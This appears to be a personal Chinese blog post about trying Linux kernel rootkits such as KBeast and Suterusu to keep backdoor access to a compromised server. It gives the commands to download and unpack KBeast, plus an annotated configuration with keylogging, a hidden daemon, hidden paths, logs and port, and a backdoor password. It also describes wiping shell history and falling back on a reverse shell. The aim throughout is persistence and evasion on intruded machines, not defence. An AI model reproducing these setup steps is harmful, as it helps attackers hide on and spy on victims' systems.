rootkit 变种 试用笔记

很多时候反弹shell还是不太方便,需要一个外网IP,要么自己有路由器的权限,做内网映射,而且用自己家的ip是不太稳定的,如果没有权限,总不能arp欺骗吧,如果有路由器权限还可以用花生壳做映射。都不是完美的解决方案,应该直接写入后门,不用做反向连接是比较好的,反弹shell的话,有可能会拥有添加账户的权限,也可以去尝试,如果不能的话,只能维持后门了,听说roobkit特别强大,就花时间研究了下,网上都写的不细,实际中成功的机会不大、

开始是用的kbeast,看了网上写的参数介绍不太全,在这里补全一下:
首先下载、解压、进入目录、编辑配置文件:
wget http://core.ipsecs.com/rootkit/kernel-rootkit/ipsecs-kbeast-v1.tar.gz
tar zxvf ipsecs-kbeast-v1.tar.gz
cd kbeast-v1/
vim config.h

#使用键盘记录可能不稳定,推荐开启
define _KEYLOG_ TRUE

#定义守护进程的名字
define KBEAST “sheller”

#定义程序路径,防止被误删或者查杀
define _H4X_PATH_ “/usr/rootkit”

#会在这个路径保存日志,必须使用_h4x_路径
define _H4X_PATH_ “/usr/_h4x_”

#此处产生的日志文件是隐藏的
define _LOGFILE_ “access_log”

#监听的端口,netstat命令查不到,不过可以用nmap外部扫描到噢、
define _HIDE_PORT_ 55555

#配置用户名和密码
define _RPASSWORD_ “hacker”
define _MAGIC_NAME_ “root” #用户名要有bash权限

然后安装:./setup build 会出现 Compiling Kernel Module : [NOT OK] 的错误,尝试安装了kernel-headers、kernel、kernel-dev,都是不行,会爆Checking for Kernel Header : [NOT OK] – Please Install!这个错误。
看了下是正常的:echo? linux-headers-$(uname -r)
看一下我的内核是 uname -r?? 2.6.18 ,貌似写不进去,kernel是内核级roobkit、、
然后就history? -c,找了suterusu:https://github.com/mncoppola/suterusu,尝试编译也是不行;
再后来,不行就先用个应用版的吧,去找国内知名的向日葵去了。下载下来都是.so编译的动态库,没有介绍的run.sh,官网的电脑板远程控制直接打不开,暂时放弃了吧。先用脚本反弹shell用着吧,以后继续留意rootkit、
第一种 kbeast 在一些linux下估计还适用,可以写入内核,然后就可以用nc或telnet链接啦、、、

发表评论

电子邮件地址不会被公开。 必填项已用*标注